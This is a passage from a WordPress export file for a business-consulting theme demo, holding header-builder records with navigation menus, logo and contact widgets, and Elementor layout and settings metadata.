}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:6:"layout";a:3:{s:14:"section_layout";a:2:{s:6:"layout";i:2;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}s:19:"header_custom_class";a:2:{s:12:"sticky_class";i:1;s:17:"sticky_background";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:6:"margin";i:1;s:7:"padding";i:2;}}}}s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:5:"style";a:2:{s:18:"style_menu_section";a:5:{s:10:"space_item";i:1;s:16:"text_hover_color";i:1;s:26:"menu_typography_typography";i:1;s:25:"menu_typography_font_size";i:1;s:27:"menu_typography_font_weight";i:1;}s:19:"style_smenu_section";a:1:{s:27:"smenu_typography_typography";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_form_section";a:1:{s:6:"bg_btn";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"button_section";a:2:{s:4:"text";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:1:{s:6:"btn_bg";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header Mobile - Logo Center</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/ot_header_builders/header-mobile-logo-center/</link>
		<pubDate>Sat, 23 May 2020 11:00:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=168</guid>
		<description></description>
		<content:encoded><![CDATA[<button></button>
						<a href="#"></a>
							<ul id="menu-main-menu"><li id="menu-item-1291"><a href="http://wpdemo.archiwp.com/maxbizz-consulting">Home</a></li>
<li id="menu-item-1292"><a href="#">Pages</a>
<ul>
	<li id="menu-item-1320"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/about-us/">About Us</a></li>
	<li id="menu-item-1342"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/">Our Services 1</a></li>
	<li id="menu-item-1337"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-1326"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-1327"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-team/">Our Team</a></li>
	<li id="menu-item-1328"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-1324"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/elements/">Elements</a></li>
	<li id="menu-item-1329"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/typography/">Typography</a></li>
	<li id="menu-item-1325"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/faqs/">FAQs</a></li>
	<li id="menu-item-1321"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/404-2/">404</a></li>
	<li id="menu-item-1322"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1340"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1343"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1341"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1339"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1346"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1338"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/">Services</a>
<ul>
	<li id="menu-item-1336"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1335"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1334"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1333"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1332"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1331"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-1330"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/blog/">Blog</a>
<ul>
	<li id="menu-item-1344"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/blog/">Blog List</a></li>
	<li id="menu-item-1345"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/2020/02/24/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-1323"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/contacts/">Contacts</a></li>
</ul>						   	
				<a href="http://wpdemo.archiwp.com/maxbizz-consulting/">
					<img src="https://maxbizz.s3.amazonaws.com/images/02_Black.svg" alt="Maxbizz Consulting">
				</a>			        
				<!-- Form Search on Header -->
						
    <label>Search for:
    </label>
	<button type="submit"></button>
    ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>168</wp:post_id>
		<wp:post_date><![CDATA[2020-05-23 11:00:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-05-23 11:00:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-mobile-logo-center]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"d17082b","elType":"section","settings":{"structure":"30","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"}},"elements":[{"id":"cd86fb1","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_mobile":30,"_ot_content_align":"horizontal"},"elements":[{"id":"82c9ed8","elType":"widget","settings":{"nav_menu":"main-menu","icon_color":"#000000","pos_menu":"on-left"},"elements":[],"widgetType":"imenu_mobile"}],"isInner":false},{"id":"331e8c4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_mobile":40},"elements":[{"id":"9b03ba7","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02_Black.svg","id":350},"_padding":{"unit":"px","top":"22","right":"0","bottom":"22","left":"0","isLinked":false},"align":"center","logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"1f2ae1c","elType":"column","settings":{"_column_size":33,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal","_inline_size_mobile":30},"elements":[{"id":"5b15a8e","elType":"widget","settings":{"icon_color":"#000000","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false}},"elements":[],"widgetType":"isearch"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-07-23]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:12:"imenu_mobile";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}s:7:"content";a:1:{s:15:"content_section";a:1:{s:8:"pos_menu";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:4:{s:12:"_inline_size";i:3;s:19:"_inline_size_mobile";i:3;s:17:"_ot_content_align";i:2;s:5:"align";i:1;}}}}s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:10:"logo_image";i:1;s:5:"align";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:1;s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:17:"section_structure";a:1:{s:9:"structure";i:1;}}s:5:"style";a:1:{s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/ot_header_builders/header-3/</link>
		<pubDate>Fri, 24 Jul 2020 03:48:42 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=182</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-business/">
					<img src="https://maxbizz.s3.amazonaws.com/images/03_White.svg" alt="Maxbizz Business">
				</a>			        
				<a href="tel:+1-800-456-478-23">
				

	
		
	

				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				

	
		
	

				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
								
				<h6>
					Our Working Hours
				</h6>
								<p>Mon - Sat: 8.00 - 18.00</p>
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-1432"><a href="http://wpdemo.archiwp.com/maxbizz-consulting">Home</a></li>
<li id="menu-item-1433"><a href="#">Pages</a>
<ul>
	<li id="menu-item-1537"><a href="http://wpdemo.archiwp.com/maxbizz-business/about-us/">About Us</a></li>
	<li id="menu-item-1559"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/">Our Services 1</a></li>
	<li id="menu-item-1554"><a href="http://wpdemo.archiwp.com/maxbizz-business/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-1543"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-1544"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-team/">Our Team</a></li>
	<li id="menu-item-1545"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-1541"><a href="http://wpdemo.archiwp.com/maxbizz-business/elements/">Elements</a></li>
	<li id="menu-item-1546"><a href="http://wpdemo.archiwp.com/maxbizz-business/typography/">Typography</a></li>
	<li id="menu-item-1542"><a href="http://wpdemo.archiwp.com/maxbizz-business/faqs/">FAQs</a></li>
	<li id="menu-item-1538"><a href="http://wpdemo.archiwp.com/maxbizz-business/404-2/">404</a></li>
	<li id="menu-item-1539"><a href="http://wpdemo.archiwp.com/maxbizz-business/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1557"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1560"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1558"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1556"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1563"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1555"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/">Services</a>
<ul>
	<li id="menu-item-1553"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1552"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1551"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1550"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1549"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1548"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-1547"><a href="http://wpdemo.archiwp.com/maxbizz-business/blog/">Blog</a>
<ul>
	<li id="menu-item-1561"><a href="http://wpdemo.archiwp.com/maxbizz-business/blog/">Blog List</a></li>
	<li id="menu-item-1562"><a href="http://wpdemo.archiwp.com/maxbizz-business/2020/02/24/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-1540"><a href="http://wpdemo.archiwp.com/maxbizz-business/contacts/">Contacts</a></li>
</ul>			</nav>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Instagram
											</a>
				<!-- Form Search on Header -->
						
    <label>Search for:
    </label>
	<button type="submit"></button>
    ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>182</wp:post_id>
		<wp:post_date><![CDATA[2020-07-24 03:48:42]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-24 03:48:42]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-3]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.12]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"15f82ce","elType":"section","settings":{"content_position":"middle","structure":"20","padding":{"unit":"px","top":"17","right":"0","bottom":"48","left":"0","isLinked":false},"background_background":"classic","background_color":"#282828","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"}},"elements":[{"id":"d78080f","elType":"column","settings":{"_column_size":50,"_inline_size":20},"elements":[{"id":"2b1b8bd","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03_White.svg","id":377},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"d4b56e5","elType":"column","settings":{"_column_size":50,"_inline_size":80,"_ot_content_align":"horizontal","align":"flex-end"},"elements":[{"id":"cd56b26","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#A5A5A5","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"0","isLinked":false},"link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"3c30484","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":24,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#A5A5A5","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"74c4536","elType":"widget","settings":{"title_text":"Our Working Hours","description_text":"Mon - Sat: 8.00 - 18.00","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/symbol.svg","id":356},"library":"svg"},"title_color":"#A5A5A5","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false}},"elements":[],"widgetType":"icon-box"}],"isInner":false}],"isInner":false},{"id":"3346a7f","elType":"section","settings":{"content_width":{"unit":"px","size":1280,"sizes":[]},"background_background":"classic","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"margin":{"unit":"px","top":"-33","right":0,"bottom":"-40","left":0,"isLinked":false}},"elements":[{"id":"7fae78a","elType":"column","settings":{"_column_size":100,"_inline_size":null,"content_position":"center","align":"flex-end","_ot_column_min_width":{"unit":"px","size":220,"sizes":[]},"_ot_content_align":"horizontal"},"elements":[{"id":"4d3a690","elType":"section","settings":{"layout":"full_width","structure":"20","background_background":"classic","background_color":"#FFFFFF","border_radius":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"padding":{"unit":"px","top":"0","right":"40","bottom":"0","left":"40","isLinked":false}},"elements":[{"id":"911d327","elType":"column","settings":{"_column_size":50,"_inline_size":74.957999999999998408384271897375583648681640625,"_ot_content_align":"horizontal"},"elements":[{"id":"82c5870","elType":"widget","settings":{"nav_menu":"main-menu","text_hover_color":"#D92300","menu_typography_typography":"custom","menu_typography_font_family":"Raleway","menu_typography_font_weight":"700"},"elements":[],"widgetType":"imenu"}],"isInner":true},{"id":"e0ea046","elType":"column","settings":{"_column_size":50,"_inline_size":25.042000000000001591615728102624416351318359375,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"9e80548","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"#02010100","__globals__":{"item_icon_primary_color":""}},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)","_id":"e7140d6"}],"shape":"circle","align":"","icon_size":{"unit":"px","size":13,"sizes":[]},"icon_padding":{"unit":"em","size":0.5,"sizes":[]},"icon_spacing":{"unit":"px","size":8,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"#C9C9C9","_padding":{"unit":"px","top":"22","right":"0","bottom":"22","left":"0","isLinked":false},"icon_color":"custom","hover_primary_color":"#D92300","hover_border_color":"#D92300","icon_secondary_color":"#373737","hover_secondary_color":"#FFFFFF"},"elements":[],"widgetType":"social-icons"},{"id":"60be152","elType":"widget","settings":{"bg_btn":"#D92300","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false}},"elements":[],"widgetType":"isearch"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:7:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:5;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:5:{s:12:"_inline_size";i:5;s:17:"_ot_content_align";i:4;s:5:"align";i:3;s:16:"content_position";i:1;s:20:"_ot_column_min_width";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:1;}}s:5:"style";a:2:{s:18:"section_style_icon";a:3:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;}s:21:"section_style_content";a:12:{s:26:"content_vertical_alignment";i:3;s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:3;}}}}s:7:"section";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:16:"content_position";i:1;s:6:"layout";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:2;s:6:"margin";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:3;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:26:"box_shadow_box_shadow_type";i:2;s:21:"box_shadow_box_shadow";i:3;s:13:"border_radius";i:1;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:5:"style";a:1:{s:18:"style_menu_section";a:4:{s:16:"text_hover_color";i:1;s:26:"menu_typography_typography";i:1;s:27:"menu_typography_font_family";i:1;s:27:"menu_typography_font_weight";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:7;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:8:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;s:20:"icon_secondary_color";i:1;}s:20:"section_social_hover";a:3:{s:19:"hover_primary_color";i:1;s:18:"hover_border_color";i:1;s:21:"hover_secondary_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_form_section";a:1:{s:6:"bg_btn";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/ot_header_builders/header-4/</link>
		<pubDate>Fri, 24 Jul 2020 06:55:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=217</guid>
		<description></description>
		<content:encoded><![CDATA[<ul>
							<li>
													
										  Mon - Sat: 8.00 - 18.00
									</li>
								<li>
							

	
		
	

						
										411 University St, Seattle
									</li>
								<li>
					<a href="tel:+1-800-456-478-23">						
							

	
		
	

						
										+1-800-456-478-23
											</a>
									</li>
						</ul>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
